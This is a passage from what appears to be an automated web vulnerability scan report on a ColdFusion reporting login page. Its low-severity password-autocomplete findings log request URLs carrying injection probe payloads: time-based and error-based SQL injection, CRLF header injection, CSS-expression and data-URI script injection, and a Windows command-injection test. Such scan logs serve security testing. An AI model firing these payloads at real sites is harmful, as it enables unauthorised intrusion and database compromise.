       <form name="form1" action="/hmc/report/index.cfm?register=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.177. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='+OR+'1'%3d'1

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register='+OR+'1'%3d'1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='+OR+'1'%3d'1" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.178. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27);WAITFOR%20DELAY%20%270:0:25%27--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%27);WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27);WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.179. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%0D%0Ans:netsparker056650=vuln

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%0D%0Ans:netsparker056650=vuln HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%0D%0Ans:netsparker056650=vuln" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.180. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=data%3A%3Bbase64%2CJyI%2bPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDE5KTwvc2NyaXB0Pg%3d%3d

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=data%3A%3Bbase64%2CJyI%2bPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDE5KTwvc2NyaXB0Pg%3d%3d HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=data%3A%3Bbase64%2CJyI%2bPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDE5KTwvc2NyaXB0Pg%3d%3d" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.181. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27));WAITFOR%20DELAY%20%270:0:25%27--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%27));WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27));WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.182. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=body%7bx:expression(netsparker(0x000033))%7d

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/index.cfm?nsextt=body%7Bx:expression(netsparker(0x000033))%7D HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:48 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:48 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=body%7bx:expression(netsparker(0x000033))%7d" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.183. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22%26%20SET%20%2FA%200xFFF9999-2%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%22%26%20SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:36 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%22%26%20SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.184. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1+AND+'NS%3d'ss

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=1+AND+'NS%3d'ss HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1+AND+'NS%3d'ss" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.185. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-111)%20OR%20SLEEP(25)=0%20LIMIT%201--+

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=-111)%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-111)%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.186. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=1%20ns=netsparker(0x000013)%20

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/index.cfm?nsextt=1%20ns=netsparker(0x000013)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=1%20ns=netsparker(0x000013)%20" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.187. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=http://www.netsparker.com?

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=http://www.netsparker.com? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=http://www.netsparker.com?" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.188. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27)%3BSELECT%20pg_sleep(25)--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%27)%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:09 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27)%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.189. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=%3c/a%20style=x:expre/**/ssion(netsparker(0x00002a))%3e

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/index.cfm?nsextt=%3C/a%20style=x:expre/**/ssion(netsparker(0x00002A))%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=%3c/a%20style=x:expre/**/ssion(netsparker(0x00002a))%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.190. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.191. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-111%20OR%201=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)%20

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=-111%20OR%201=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:07 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-111%20OR%201=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.192. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
